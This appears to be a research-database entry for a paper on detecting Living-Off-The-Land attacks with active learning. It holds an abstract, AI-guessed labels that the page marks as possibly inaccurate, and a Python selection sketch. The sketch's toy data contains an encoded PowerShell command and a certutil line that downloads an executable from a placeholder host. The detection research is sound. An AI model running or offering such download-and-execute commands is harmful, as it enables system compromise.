Living-Off-The-Land Command Detection Using Active Learning


arxiv

AI Security Portal bot

Information in the literature database is collected automatically.

Source

https://arxiv.org/abs/2111.15039

PDF

https://arxiv.org/pdf/2111.15039

Paper Information

Author: Talha Ongun;Jack W. Stokes;Jonathan Bar Or;Ke Tian;Farid Tajaddodianfar;Joshua Neil;Christian Seifert;Alina Oprea;John C. Platt
Published: 11-30-2021
Affiliation: Northeastern University
Country: United States of America
Conference: International Symposium on Recent Advances in Intrusion Detection (RAID)

Labels Estimated by AI

Active Learning, Backdoor Attack, Malware Detection Method

These labels were automatically added by AI and may be inaccurate.

Abstract

In recent years, enterprises have been targeted by advanced adversaries who leverage creative ways to infiltrate their systems and move laterally to gain access to critical data. One increasingly common evasive method is to hide malicious activity behind a benign program by using tools that are already installed on user computers. These programs are usually part of the operating system distribution or another user-installed binary; therefore, this type of attack is called "Living-Off-The-Land". Detecting these attacks is challenging: adversaries may not create malicious files on the victim computers, and anti-virus scans therefore fail to detect them. We propose LOLAL, an Active Learning framework for detecting Living-Off-The-Land attacks, which iteratively selects a set of uncertain and anomalous samples for labeling by a human analyst. LOLAL is specifically designed to work well when only a limited number of labeled samples is available for training machine learning models to detect attacks. We investigate methods to represent command-line text using word-embedding techniques, and design ensemble boosting classifiers to distinguish malicious from benign samples based on the embedding representation. We leverage a large, anonymized dataset collected by an endpoint security product and demonstrate that our ensemble classifiers achieve an average F1 score of 0.96 at classifying different attack classes. We show that our active learning method consistently improves classifier performance as more training data is labeled, and converges in fewer than 30 iterations when starting with a small number of labeled instances.
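The abstract describes LOLAL's loop only at a high level: embed command lines, score them with a classifier, and send uncertain and anomalous samples to an analyst. The following is a minimal sketch of one such selection round under stated assumptions, not the paper's implementation. The tokenizer, the toy token vectors, the centroid-distance anomaly score, and the names `tokenize`, `embed`, `anomaly_scores`, and `select_for_labeling` are all hypothetical. A real system would use trained word embeddings (for example word2vec or fastText) and the paper's boosting classifiers to produce the malicious-class probabilities.

```python
import math
import re
from typing import Dict, List, Sequence, Set

# Hypothetical separator set; the paper's actual tokenizer may differ.
_SEPARATORS = re.compile(r"[\s\\/=:,\"']+")


def tokenize(cmd: str) -> List[str]:
    """Lowercase a command line and split it on whitespace and path/flag separators."""
    return [tok for tok in _SEPARATORS.split(cmd.lower()) if tok]


def embed(cmd: str, vectors: Dict[str, List[float]], dim: int) -> List[float]:
    """Average the vectors of in-vocabulary tokens (zero vector if none are known)."""
    known = [vectors[tok] for tok in tokenize(cmd) if tok in vectors]
    if not known:
        return [0.0] * dim
    return [sum(v[i] for v in known) / len(known) for i in range(dim)]


def anomaly_scores(points: Sequence[Sequence[float]]) -> List[float]:
    """Stand-in anomaly score: Euclidean distance from the centroid of all points."""
    n, dim = len(points), len(points[0])
    centroid = [sum(p[i] for p in points) / n for i in range(dim)]
    return [math.dist(p, centroid) for p in points]


def select_for_labeling(
    probs: Sequence[float],
    anomaly: Sequence[float],
    labeled: Set[int],
    k_uncertain: int,
    k_anomalous: int,
) -> List[int]:
    """Pick unlabeled indices: the most uncertain first, then the most anomalous."""
    pool = [i for i in range(len(probs)) if i not in labeled]
    # Uncertainty sampling: malicious-class probability closest to 0.5.
    uncertain = sorted(pool, key=lambda i: abs(probs[i] - 0.5))[:k_uncertain]
    taken = set(uncertain)
    # Anomaly sampling among the remaining pool: largest anomaly score first.
    rest = [i for i in pool if i not in taken]
    anomalous = sorted(rest, key=lambda i: -anomaly[i])[:k_anomalous]
    return uncertain + anomalous


if __name__ == "__main__":
    # Toy 2-D vectors standing in for trained word embeddings.
    vectors = {
        "notepad.exe": [0.0, 0.0],
        "powershell.exe": [1.0, 0.0],
        "-enc": [1.0, 1.0],
        "certutil.exe": [0.0, 1.0],
        "-urlcache": [0.0, 2.0],
    }
    cmds = [
        "notepad.exe report.txt",
        "powershell.exe -enc SQBFAFgA",
        "certutil.exe -urlcache -f http://x/a.exe",
    ]
    points = [embed(c, vectors, 2) for c in cmds]
    probs = [0.05, 0.55, 0.9]  # hypothetical classifier outputs
    picked = select_for_labeling(probs, anomaly_scores(points), set(), 1, 1)
    print(picked)  # → [1, 2]
```

Splitting the labeling budget between uncertain and anomalous samples reflects the two goals the abstract names: refining the decision boundary where the classifier is unsure, and surfacing unusual command lines that the current model may not yet cover. In a full loop, the analyst's labels would be added to the training set and the classifier retrained before the next round.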

External Datasets

process creation telemetry reports from Microsoft Defender for Endpoint

Figure (legend labels only): All Instances, Selected Samples, Labeled Samples